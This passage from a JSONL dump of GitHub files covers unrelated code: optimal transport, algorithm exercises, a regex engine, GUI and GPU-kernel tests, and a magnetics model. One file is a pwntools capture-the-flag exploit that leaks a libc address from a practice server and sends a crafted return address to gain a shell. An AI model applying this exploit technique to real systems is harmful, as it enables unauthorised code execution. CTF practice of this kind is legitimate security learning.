q =\\n{q}\\n K.a =\\n', Ka) \n b = np.divide(q, Ka)\n if debug: print('-'*100)\n t.append(time() - s)\n except FloatingPointError as e:\n if verbose:\n print(e)\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f}ms per iteration')\n break\n \n if store_err:\n with np.errstate(divide='raise', over='raise', under='raise'):\n try:\n g0 = a * (K.matvec(b, debug))\n g1 = b * (K.matvec(a, debug))\n except:\n pass\n err.append(np.linalg.norm(g0 - p) + np.linalg.norm(g1 - q))\n ###########################################################\n if verbose == 2:\n print(f'{i:5.0f}: {err[-1]:.20f}')\n if plot == 2:\n IPython.display.clear_output(wait=True)\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration, step {np.abs(err[-2] - err[-1]):.3e}')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.savefig('error.png')\n plt.close()\n \n if early_stopping:\n # if good enough\n if err[-1] < eps:\n 
if verbose:\n print(f'#iterations={i+1}, early stopping: eps, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n # if no improvements\n if np.abs(err[-2] - err[-1]) < tol:\n j += 1\n if j > patience:\n if verbose:\n print(f'#iterations={i+1}, early stopping: tol, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n j = 0\n # if error goes up\n if err[-1] > err[-2]:\n if verbose:\n print(f'#iterations={i+1}, early stopping: error up, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n if verbose:\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n if plot and store_err:\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f}ms per iteration')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.savefig('error.png')\n plt.close()\n method='toeplitz'\n np.save(f'K_{method}.npy', K)\n np.save(f'a_{method}.npy', a)\n np.save(f'b_{method}.npy', b)\n if testtime:\n if return_err:\n return K, a, b, bins, p, q, testtime, err\n else:\n if return_err:\n return K, a, b, bins, p, q, err\n return K, a, b, bins, p, q\n","repo_name":"svdcvt/sinkhorn_ot","sub_path":"sinkhorn_utils.py","file_name":"sinkhorn_utils.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"756529366","text":"#coding:utf-8\nimport sys\nimport base64\nfrom pwn import *\ncontext.log_level='debug'\ncontext.arch='i386'\nwhile True :\n\t#try :\n\t\tif len(sys.argv)==1 :\n\t\t\tio=process('./exploitable')\n\t\t\t#io=process(['./pwn'],env={'LD_PRELOAD':'./libc.so.6'})\n\t\t\telf=ELF('./exploitable')\n\t\t\tlibc=ELF('/lib/i386-linux-gnu/libc-2.23.so')\n\t\telse :\n\t\t\tio=remote('node3.buuoj.cn',26732)\n\t\t\telf=ELF('exploitable')\n\t\t\tlibc=ELF('../../i386libc/x86_libc.so.6')\n\t\t\n\t\t\n\t\tlibc_base=u32(io.recv(4))-libc.sym['_IO_2_1_stdout_']\n\t\tlibc.address=libc_base\n\t\t# gdb.attach(io)\n\t\t# pause()\n\t\tio.sendline(str(libc_base+0x3a80c-0x100000000))\n\n\n\t\tsuccess(hex(libc_base))\n\t\tio.interactive()\n\n\n\t#except Exception as e:\n\t\t#raise e\n\t#else:\n\t\t#pass","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"pwnable.kr/exploitable/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"24340797576","text":"def find_array_quadruplet(arr, s):\r\n # corner case\r\n if len(arr) < 4:\r\n return []\r\n if len(arr) == 4:\r\n if sum(arr) == s:\r\n return sorted(arr)\r\n return []\r\n \r\n arr.sort()\r\n def two_sum(nums, start, end, target):\r\n res = set()\r\n while start < end:\r\n summation = nums[start] + nums[end]\r\n if summation == target:\r\n res.add((nums[start], nums[end]))\r\n start += 1\r\n end -= 1\r\n elif summation < target:\r\n start += 1\r\n else:\r\n end -= 1\r\n return res \r\n\r\n def three_sum(nums, target):\r\n res = set()\r\n for i in range(len(nums) - 2):\r\n doublets = two_sum(nums, i + 1, len(nums) - 1, target - nums[i])\r\n if doublets:\r\n for doublet in doublets:\r\n res.add((nums[i], doublet[0], doublet[1]))\r\n return res\r\n\r\n res = set()\r\n for i in range(len(arr) - 3):\r\n triplets = three_sum(arr[i + 1:], s - arr[i])\r\n if triplets:\r\n for triplet in triplets:\r\n res.add((arr[i], triplet[0], triplet[1], triplet[2]))\r\n if not res:\r\n 
return []\r\n res_sort = [sorted(i) for i in res]\r\n res_sort.sort()\r\n return res_sort[0]\r\n\r\ndef find_array_quadruplet_1(arr, s):\r\n if len(arr) < 4:\r\n return []\r\n\r\n def two_sum(nums, start, end, target):\r\n while start < end:\r\n summation = nums[start] + nums[end]\r\n if summation == target:\r\n return (start, end)\r\n elif summation < target:\r\n start +=1 \r\n else:\r\n end -= 1\r\n return (-1, -1)\r\n\r\n arr.sort()\r\n start = 0\r\n end = len(arr) - 1\r\n while start < end:\r\n summation = arr[start] + arr[end]\r\n if summation < s:\r\n middle_indexes = two_sum(arr, start + 1, end - 1, s - summation)\r\n if middle_indexes != (-1, -1):\r\n return [arr[start], arr[middle_indexes[0]], arr[middle_indexes[1]], arr[end]]\r\n\r\n if summation > s:\r\n end -= 1\r\n else:\r\n start += 1\r\n return []\r\n\r\ndef find_array_quadruplet_2(arr, s):\r\n if len(arr) < 4:\r\n return []\r\n\r\n arr.sort()\r\n for i in range(len(arr) - 3):\r\n for j in range(i + 1, len(arr) - 2):\r\n r = s - arr[i] - arr[j]\r\n l = j + 1\r\n h = len(arr) - 1\r\n while l < h:\r\n if arr[l] + arr[h] < r:\r\n l += 1\r\n elif arr[l] + arr[h] > r:\r\n h -=1\r\n else:\r\n return [arr[i], arr[j], arr[l], arr[h]]\r\n\r\n return []\r\n \r\n\r\nprint(find_array_quadruplet([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet([1,2,3,4,5,9,19,12,12,19], 40))\r\n\r\nprint(find_array_quadruplet_1([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet_1([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet_1([1,2,3,4,5,9,19,12,12,19], 40))\r\n\r\nprint(find_array_quadruplet_2([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet_2([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet_2([1,2,3,4,5,9,19,12,12,19], 40))\r\n","repo_name":"curieshicy/My_Utilities_Code","sub_path":"Useful_Code_Snippets/array_quadruplet.py","file_name":"array_quadruplet.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14844538124","text":"class Regex:\n\n def match(self, pattern, string):\n pattern_1 = pattern\n if '?' 
in pattern or '*' in pattern or '+' in pattern:\n if '\\\\' not in pattern:\n pattern = self.check_repeat(pattern, string)\n pattern = pattern.replace('\\\\', '')\n if '^' in pattern_1 and '^' not in pattern:\n pattern = '^' + pattern\n if '$' in pattern_1 and '$' not in pattern:\n pattern += '$'\n if pattern.startswith('^') and pattern.endswith('$'):\n return pattern[1:-1] == string\n elif pattern.startswith('^'):\n pattern, string = pattern[1:], string[:len(pattern) - 1]\n elif pattern.endswith('$'):\n pattern, string = pattern[:-1], string[-(len(pattern) - 1):]\n return self.iterate(pattern, string)\n\n def iterate(self, pattern, string):\n for i in range(len(string) - len(pattern) + 1):\n if self.compare(pattern, string[i:i + len(pattern)]):\n return True\n return False\n\n @staticmethod\n def compare(pattern, string):\n if '\\\\' in pattern:\n pattern = pattern.replace('\\\\', '')\n if pattern and string:\n for i, j in zip(pattern, string):\n if i == j or i == '.':\n continue\n else:\n return False\n return True\n elif not pattern and not string or string:\n return True\n return False\n\n def check_repeat(self, pattern, string):\n for i in '?*+':\n if i in pattern:\n index = pattern.index(i)\n zero = pattern[:index - 1] + pattern[index + 1:]\n once = pattern.replace(i, '')\n if i == '?':\n return zero if zero == string else once\n elif i == '*':\n return zero if zero == string else self.repeat(pattern, string)\n else:\n more = self.repeat(pattern, string)\n return more\n return pattern\n\n @staticmethod\n def repeat(pattern, string):\n for i, j in enumerate(pattern):\n if j == '.':\n pattern = pattern.replace(j, string[i - 1])\n elif j in '^$':\n pattern = pattern.replace(j, '')\n index = pattern.index('*') if '*' in pattern else pattern.index('+')\n head = pattern[:index]\n tail = pattern[index + 1:]\n while head + head[-1] in string:\n head += head[-1]\n else:\n return head + tail\n\n\nif __name__ == '__main__':\n re = Regex()\n target = input().split('|')\n result = re.match(*target)\n print(result)\n","repo_name":"icsolution/Regex_Engine","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34347253257","text":"class Solution:\r\n # @param A : list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n\r\n if len(A) % 2 == 0:\r\n return 0\r\n\r\n else:\r\n xorVal = A[0]\r\n for i in range(2, len(A), 2):\r\n xorVal ^= A[i]\r\n\r\n return xorVal\r\n\r\nans = Solution()\r\nA = [1, 2, 3]\r\nprint(ans.solve(A))","repo_name":"PrinceSinghhub/InterviewBit-Bit-Manipulation","sub_path":"Interview Bit Bit Manipulation/XOR-ing the Subarrays!.py","file_name":"XOR-ing the Subarrays!.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"13430526182","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n\n path('', views.index, name='index'),\n\n path('projects', views.project, name='projects'),\n\n path('tag/', views.tag, name='single-tag'),\n\n path('project/', views.single_project, name='project'),\n\n path('contact', views.contact, name='contact'),\n\n]","repo_name":"rickmutua/rickmutua.github.io","sub_path":"rick/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9866717397","text":"import tkinter as tk\nfrom tkinter import ttk\nimport pyodbc\nfrom tkinter import messagebox, END\n# Utilize tkinter class to accomplish the following:\n#\n# Create a window with an appropriate title\nfrom tkinter.messagebox import showinfo\n\nwindow = tk.Tk()\nwindow.geometry(\"800x600\")\nwindow.title('Welcome to the Class tkinter assignment')\n#window_title = tk.Label(text = \"Welcome to the CYSE 1002-B 6184 Class March 23st tkinter assignment\",foreground=\"blue\",background=\"black\",width = 500,height=5)\n#window_title.pack()\n\n#Combo box\nlabel = ttk.Label(text=\"Please select a Semester:\")\nlabel.pack(fill=tk.X, padx=5, pady=5)\nlabel.place(x=400, y = 110)\n\n# create a combobox\nselected_sem = tk.StringVar()\nsem_cb = ttk.Combobox(textvariable=selected_sem)\n# place the widget\nsem_cb.pack(fill=tk.X, padx=5, pady=5)\nsem_cb.place(x=400, y = 130)\n\n\n\nsem_cb['values'] = [('Winter', 'First Semester selected!'),\n ('Spring', 'Second Semester selected!'),\n ('Fall', 'Third Semester selected!'),\n ('Internship', 'Co-op Semester selected!')]\n\n# prevent typing a value\nsem_cb['state'] = 'readonly'\n\n\n\n# bind the selected value changes\ndef sem_changed(event):\n ##\"\"\" Handle the Semester changed event \"\"\"\n showinfo(\n title='Result',\n message=f'You selected {selected_sem.get()}!'\n )\n\nsem_cb.bind('<>', sem_changed)\n\n\n\n#radio button selection\ndef show_selected_sem():\n showinfo(\n title='Result',\n message=selected_sem.get()\n )\nselected_sem = tk.StringVar()\nsizes = (('Winter', 'First Semester selected!'),\n ('Spring', 'Second Semester selected!'),\n ('Fall', 'Third Semester selected!'),\n ('Internship', 'Co-op Semester selected!'))\nlabel = tk.Label(text=\"Select Any Semester?\")\nlabel.pack(fill='x', padx=4, pady=4)\nlabel.place(x=200, y = 110)\n\n# radio buttons\ncount = 5\nfor size in sizes:\n r = tk.Radiobutton(\n text=size[0],\n value=size[1],\n variable=selected_sem\n )\n r.pack(padx=4, pady=4)\n r.place(x=200+count, y=140+count)\n\n\n# # button\n# button = tk.Button(\n# text=\"Get Selected Semester\",\n# command=show_selected_sem)\n#\n# button.pack(fill='x', padx=5, pady=5)\n# button.place(x=200,y=300)\n\n#combo box\n\nwindow.mainloop()\n","repo_name":"Prabhjeet93/tkInterProjectPython","sub_path":"tkinterProject2.py","file_name":"tkinterProject2.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72646831896","text":"import unittest\n\nfrom typing import List\n\nimport torch\n\nfrom aitemplate.compiler import compile_model, ops\nfrom aitemplate.compiler.ops.common.epilogue import FuncEnum\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.testing import detect_target\nfrom aitemplate.utils import shape_utils\nfrom aitemplate.utils.graph_utils import get_sorted_ops\n\n\nclass GemmRrrSmallNkTestCase(unittest.TestCase):\n def _create_gemm_rrr_graph(self, M, K, N):\n X = Tensor(shape=[M, K], 
dtype=\"float16\", name=\"input_0\", is_input=True)\n W = Tensor(shape=[K, N], dtype=\"float16\", name=\"input_1\", is_input=True)\n OP = ops.gemm_rrr()\n Y = OP(X, W)\n Y._attrs[\"name\"] = \"gemm_rrr_tensor\"\n Y._attrs[\"is_output\"] = True\n\n return X, W, Y\n\n def _test_small_nk(self, Ms, N, K, testname=None):\n if testname is None:\n testname = \"gemm_rrr_small_nk_{}_{}_{}\".format(Ms, N, K)\n testname = testname.replace(\" \", \"\")\n testname = testname.replace(\"[\", \"\")\n testname = testname.replace(\"]\", \"\")\n\n X, W, gemm_tensor = self._create_gemm_rrr_graph(\n shape_utils.gen_int_var_min_max(Ms), K, N\n )\n\n output = ops.elementwise(FuncEnum.COS)(gemm_tensor)\n output._attrs[\"name\"] = \"output_0\"\n output._attrs[\"is_output\"] = True\n\n # Check value correctness\n target = detect_target()\n module = compile_model([output, gemm_tensor], target, \"./tmp\", testname)\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"gemm_rrr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(\n output_tensor, \"Cannot find output tensor from module's graph\"\n )\n self.assertEqual(\n len(output_tensor._attrs[\"src_ops\"]),\n 1,\n \"Incorrect counts of src_ops in output\",\n )\n\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n self.assertEqual(\n src_op._attrs[\"op\"], \"gemm_rrr_small_nk\", \"output op type incorrect\"\n )\n\n for m in Ms:\n X_pt = torch.randn(m, K).cuda().half()\n W_pt = torch.randn(K, N).cuda().half()\n mm_pt = torch.matmul(X_pt, W_pt)\n Y_pt = torch.cos(mm_pt)\n y = torch.empty([m, N]).cuda().half()\n gemm_tensor_pt = torch.empty([m, N]).cuda().half()\n module.run_with_tensors(\n {\"input_0\": X_pt, \"input_1\": W_pt},\n {\"output_0\": y, \"gemm_rrr_tensor\": gemm_tensor_pt},\n )\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n def test_small_nk(self):\n self._test_small_nk([10], 8, 4)\n self._test_small_nk([105], 8, 8)\n self._test_small_nk([1000], 6, 4)\n\n def test_small_nk_dynamic_shape(self):\n self._test_small_nk([10, 30], 6, 4, \"dynamic\")\n self._test_small_nk([10, 30, 50], 6, 4, \"dynamic1\")\n\n def test_small_nk_alignment(self):\n self._test_small_nk([1000], 6, 3)\n self._test_small_nk([10], 6, 3)\n self._test_small_nk([100, 200], 6, 3)\n self._test_small_nk([105], 7, 1)\n\n def test_small_nk_no_transform(self):\n M, K, N = 8, 8, 16\n _, _, output = self._create_gemm_rrr_graph(M, K, N)\n\n target = detect_target()\n module = compile_model(\n output, target, \"./tmp\", \"test_small_nk_fail_{}_{}_{}\".format(M, K, N)\n )\n\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"gemm_rrr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(\n output_tensor, \"Cannot find output tensor from module's graph\"\n )\n self.assertEqual(\n len(output_tensor._attrs[\"src_ops\"]),\n 1,\n \"Incorrect counts of src_ops in output\",\n )\n\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n self.assertEqual(src_op._attrs[\"op\"], \"gemm_rrr\", \"output op type incorrect\")\n\n X_pt = torch.randn(M, K).cuda().half()\n W_pt = torch.randn(K, N).cuda().half()\n Y_pt = torch.matmul(X_pt, W_pt)\n\n y = torch.empty([M, N]).cuda().half()\n module.run_with_tensors({\"input_0\": X_pt, \"input_1\": W_pt}, [y])\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n\nclass BmmRcrN1TestCase(unittest.TestCase):\n def _create_bmm_rcr_graph(self, B, M, N, K):\n X = Tensor(shape=[B, M, K], dtype=\"float16\", name=\"input_0\", 
is_input=True)\n W = Tensor(shape=[B, N, K], dtype=\"float16\", name=\"input_1\", is_input=True)\n OP = ops.bmm_rcr()\n Y = OP(X, W)\n Y._attrs[\"name\"] = \"bmm_rcr_tensor\"\n\n return X, W, Y\n\n def _test_n1_k8(self, B, M, N, K, testname=None):\n if testname is None:\n testname = \"bmm_rcr_n1_{}_{}_{}_{}\".format(B, M, N, K)\n testname = testname.replace(\" \", \"\")\n testname = testname.replace(\"[\", \"\")\n testname = testname.replace(\"]\", \"\")\n\n X, W, bmm_tensor = self._create_bmm_rcr_graph(\n B, shape_utils.gen_int_var_min_max(M), N, K\n )\n mul = ops.elementwise(FuncEnum.MUL)(bmm_tensor, Tensor(shape=[], value=1.0))\n output = ops.elementwise(FuncEnum.COS)(mul)\n output._attrs[\"name\"] = \"output_0\"\n output._attrs[\"is_output\"] = True\n\n # Check value correctness\n target = detect_target()\n module = compile_model(output, target, \"./tmp\", testname)\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"bmm_rcr_tensor\":\n output_tensor = tensor\n break\n\n assert output_tensor is not None\n assert len(output_tensor._attrs[\"src_ops\"]) == 1\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n assert src_op._attrs[\"op\"] == \"bmm_rcr_n1\"\n\n for m in M:\n X_pt = torch.randn(B, m, K).cuda().half()\n W_pt = torch.randn(B, N, K).cuda().half()\n\n def pt_bmm(X_pt, W_pt):\n WT = torch.transpose(W_pt, 2, 1)\n Y_pt = torch.bmm(X_pt, WT)\n return Y_pt\n\n Y_pt = torch.cos(pt_bmm(X_pt, W_pt))\n\n y = torch.empty([B, m, N]).cuda().half()\n module.run_with_tensors({\"input_0\": X_pt, \"input_1\": W_pt}, [y])\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n def test_n1_k8(self):\n self._test_n1_k8(1, [8], 1, 8)\n self._test_n1_k8(10, [8], 1, 8)\n\n def test_n1_k8_dynamic(self):\n self._test_n1_k8(10, [8, 16], 1, 8)\n\n def test_n_non1_fail(self):\n B, M, K, N = 8, 8, 8, 8\n _, _, output = self._create_bmm_rcr_graph(B, M, K, N)\n output._attrs[\"is_output\"] = True\n\n target = detect_target()\n module = compile_model(output, target, \"./tmp\", \"bmm_rcr_n_non1\")\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"bmm_rcr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(output_tensor, \"bmm_rcr tensor not found\")\n self.assertEqual(len(output_tensor._attrs[\"src_ops\"]), 1)\n src_op = next(iter(output_tensor._attrs[\"src_ops\"]))\n self.assertEqual(src_op._attrs[\"op\"], \"bmm_rcr\")\n\n\n@unittest.skip(\"enable it when ck fix\")\nclass OneByOneConvTestCase(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._counter = 0\n\n def _assert_no_convs(self, sorted_graph: List[Tensor]):\n for op in get_sorted_ops(sorted_graph):\n self.assertFalse(op._attrs[\"op\"].startswith(\"conv2d\"))\n\n def _assert_has_gemm(self, sorted_graph: List[Tensor]):\n for op in get_sorted_ops(sorted_graph):\n if op._attrs[\"op\"].startswith(\"gemm_rcr\"):\n return\n raise AssertionError(\"Did not find gemm_rcr in graph\")\n\n def _test_simple_1x1_conv(\n self, batch, CO, HH, WW, CI, activation=None, with_bias=False\n ):\n if isinstance(batch, int):\n batch = (batch,)\n batch_var = shape_utils.gen_int_var_min_max(batch, name=\"batch_size\")\n X = Tensor(\n shape=[batch_var, HH, WW, CI],\n name=\"input_0\",\n is_input=True,\n )\n W = Tensor(\n shape=[CO, 1, 1, CI],\n name=\"input_1\",\n is_input=True,\n )\n\n if with_bias:\n bias = Tensor(\n shape=[CO],\n name=\"bias\",\n is_input=True,\n )\n conv2d = 
ops.conv2d_bias(stride=1, pad=0)(X, W, bias)\n else:\n conv2d = ops.conv2d(stride=1, pad=0)(X, W)\n\n if activation == \"relu\":\n conv2d = ops.elementwise(FuncEnum.RELU)(conv2d)\n elif activation == \"sigmoid\":\n conv2d = ops.elementwise(FuncEnum.SIGMOID)(conv2d)\n\n elif activation == \"hardswish\":\n # We have no FuncEnum.HARDSWISH, must use fused version\n if with_bias:\n conv2d = ops.conv2d_bias_hardswish(stride=1, pad=0)(X, W, bias)\n else:\n raise NotImplementedError(\"Cannot use hardswish on conv2d without bias\")\n\n elif activation is not None:\n raise NotImplementedError(f\"Unsupported activation {activation}\")\n\n conv2d._attrs[\"name\"] = \"output\"\n conv2d._attrs[\"is_output\"] = True\n\n with compile_model(\n conv2d,\n detect_target(),\n \"./tmp\",\n f\"test_simple_one_by_one_conv_{self._counter}\",\n ) as module:\n self._counter += 1\n self._assert_no_convs(module.debug_sorted_graph)\n self._assert_has_gemm(module.debug_sorted_graph)\n\n for batch_pt in batch:\n X_pt = torch.randn(batch_pt, CI, HH, WW).half().cuda()\n W_pt = torch.randn(CO, CI, 1, 1).half().cuda()\n\n if with_bias:\n B_pt = torch.randn(CO).half().cuda()\n else:\n B_pt = None\n\n Y_pt = torch.nn.functional.conv2d(\n X_pt, W_pt, bias=B_pt, stride=1, padding=0\n )\n\n if activation == \"relu\":\n Y_pt = torch.relu(Y_pt)\n elif activation == \"sigmoid\":\n Y_pt = torch.sigmoid(Y_pt)\n elif activation == \"hardswish\":\n Y_pt = torch.nn.functional.hardswish(Y_pt)\n elif activation is not None:\n raise NotImplementedError(f\"Unsupported activation {activation}\")\n\n Y_ait = torch.empty(batch_pt, HH, WW, CO).half().cuda()\n inputs = {\n \"input_0\": X_pt.permute(0, 2, 3, 1).contiguous(),\n \"input_1\": W_pt.permute(0, 2, 3, 1).contiguous(),\n }\n if with_bias:\n inputs[\"bias\"] = B_pt\n\n module.run_with_tensors(inputs, {\"output\": Y_ait})\n\n torch.testing.assert_close(\n Y_pt, Y_ait.permute(0, 3, 1, 2), atol=1e-1, rtol=1e-1\n )\n\n def test_1x1_conv_no_bias(self):\n self._test_simple_1x1_conv(batch=1, CO=256, HH=3, WW=4, CI=2)\n self._test_simple_1x1_conv(\n batch=3, CO=100, HH=200, WW=4, CI=2, activation=\"relu\"\n )\n self._test_simple_1x1_conv(\n batch=2, CO=128, HH=10, WW=42, CI=3, activation=\"sigmoid\"\n )\n self._test_simple_1x1_conv(batch=5, CO=256, HH=15, WW=5, CI=13)\n self._test_simple_1x1_conv(batch=(1, 10), CO=128, HH=2, WW=2, CI=10)\n\n def test_1x1_conv_with_bias(self):\n self._test_simple_1x1_conv(batch=1, CO=256, HH=3, WW=4, CI=2, with_bias=True)\n self._test_simple_1x1_conv(\n batch=3,\n CO=100,\n HH=200,\n WW=4,\n CI=2,\n activation=\"relu\",\n with_bias=True,\n )\n self._test_simple_1x1_conv(\n batch=2, CO=128, HH=10, WW=42, CI=3, activation=\"sigmoid\", with_bias=True\n )\n self._test_simple_1x1_conv(\n batch=2, CO=64, HH=10, WW=42, CI=3, activation=\"hardswish\", with_bias=True\n )\n self._test_simple_1x1_conv(batch=5, CO=256, HH=15, WW=5, CI=13, with_bias=True)\n self._test_simple_1x1_conv(\n batch=(1, 10), CO=128, HH=2, WW=2, CI=10, with_bias=True\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"qolaba/aitemplate-stable-diffusion","sub_path":"tests/unittest/compiler/test_transform_special_op.py","file_name":"test_transform_special_op.py","file_ext":"py","file_size_in_byte":12622,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"13176789298","text":"from scipy.constants import mu_0\nimport re\nimport numpy as np\nfrom SimPEG import Utils, PF\n\n\nclass problem(object):\n \"\"\"\n Earth's field:\n - 
Binc, Bdec : inclination and declination of Earth's mag field\n - Bigrf : amplitude of earth's field in units of nT\n\n Remnance:\n - Q : Koenigsberger ratio\n - Rinc, Rdec : inclination and declination of remnance in block\n\n \"\"\"\n #Bdec, Binc, Bigrf = 90., 0., 50000.\n Q, rinc, rdec = 0., 0., 0.\n uType, mType = 'tf', 'induced'\n susc = 1.\n prism = None\n survey = None\n\n @property\n def Mind(self):\n # Define magnetization direction as sum of induced and remanence\n mind = PF.Magnetics.dipazm_2_xyz([self.survey.srcField.param[1]], [self.survey.srcField.param[2]])\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n Mind = self.susc*self.Higrf*R.dot(mind.T)\n # Mind = self.susc*self.Higrf*PF.Magnetics.dipazm_2_xyz(self.Binc - self.prism.pinc,\n # self.Bdec - self.prism.pdec)\n return Mind\n\n @property\n def Mrem(self):\n\n mrem = PF.Magnetics.dipazm_2_xyz([self.rinc], [self.rdec])\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n Mrem = self.Q*self.susc*self.Higrf * R.dot(mrem.T)\n\n # Mrem = self.Q*self.susc*self.Higrf * \\\n # PF.Magnetics.dipazm_2_xyz(self.rinc - self.prism.pinc, self.rdec - self.prism.pdec)\n\n return Mrem\n\n @property\n def Higrf(self):\n Higrf = self.survey.srcField.param[0] * 1e-9 / mu_0\n\n return Higrf\n\n @property\n def G(self):\n\n if getattr(self, '_G', None) is None:\n #print \"Computing G\"\n\n # rot = Utils.mkvc(PF.Magnetics.dipazm_2_xyz(self.prism.pinc, self.prism.pdec))\n\n # rxLoc = Utils.rotatePointsFromNormals(self.survey.rxLoc, rot, np.r_[0., 1., 0.],\n # np.r_[0, 0, 0])\n\n rxLoc = self.survey.srcField.rxList[0].locs\n\n xLoc = rxLoc[:, 0] - self.prism.xc\n yLoc = rxLoc[:, 1] - self.prism.yc\n zLoc = rxLoc[:, 2] - self.prism.zc\n\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n\n rxLoc = R.dot(np.c_[xLoc, yLoc, zLoc].T).T\n\n rxLoc = np.c_[rxLoc[:, 0] + self.prism.xc, rxLoc[:, 1] + self.prism.yc, rxLoc[:, 2] + self.prism.zc]\n\n # Create the linear forward system\n self._G = Intrgl_Fwr_Op(self.prism.xn, self.prism.yn, self.prism.zn, rxLoc)\n\n return self._G\n\n def fields(self):\n\n if (self.mType == 'induced') or (self.mType == 'total'):\n\n b = self.G.dot(self.Mind)\n self.fieldi = self.extractFields(b)\n\n if (self.mType == 'remanent') or (self.mType == 'total'):\n\n b = self.G.dot(self.Mrem)\n\n self.fieldr = self.extractFields(b)\n\n if self.mType == 'induced':\n return [self.fieldi]\n elif self.mType == 'remanent':\n return [self.fieldr]\n elif self.mType == 'total':\n return [self.fieldi, self.fieldr]\n\n def extractFields(self, bvec):\n\n nD = int(bvec.shape[0]/3)\n bvec = np.reshape(bvec, (3, nD))\n\n # rot = Utils.mkvc(PF.Magnetics.dipazm_2_xyz(-self.prism.pinc, -self.prism.pdec))\n\n # bvec = Utils.rotatePointsFromNormals(bvec.T, rot, np.r_[0., 1., 0.],\n # np.r_[0, 0, 0]).T\n\n R = rotationMatrix(self.prism.pinc, self.prism.pdec)\n bvec = R.dot(bvec)\n\n if self.uType == 'bx':\n u = Utils.mkvc(bvec[0, :])\n\n if self.uType == 'by':\n u = Utils.mkvc(bvec[1, :])\n\n if self.uType == 'bz':\n u = Utils.mkvc(bvec[2, :])\n\n if self.uType == 'tf':\n # Projection matrix\n Ptmi = PF.Magnetics.dipazm_2_xyz([self.survey.srcField.param[1]],\n [self.survey.srcField.param[2]])\n\n u = Utils.mkvc(Ptmi.dot(bvec))\n\n return u\n\n\ndef Intrgl_Fwr_Op(xn, yn, zn, rxLoc):\n\n \"\"\"\n\n Magnetic forward operator in integral form\n\n flag = 'ind' | 'full'\n\n 1- ind : Magnetization fixed by user\n\n 3- full: Full tensor matrix stored with shape([3*ndata, 3*nc])\n\n Return\n _G = 
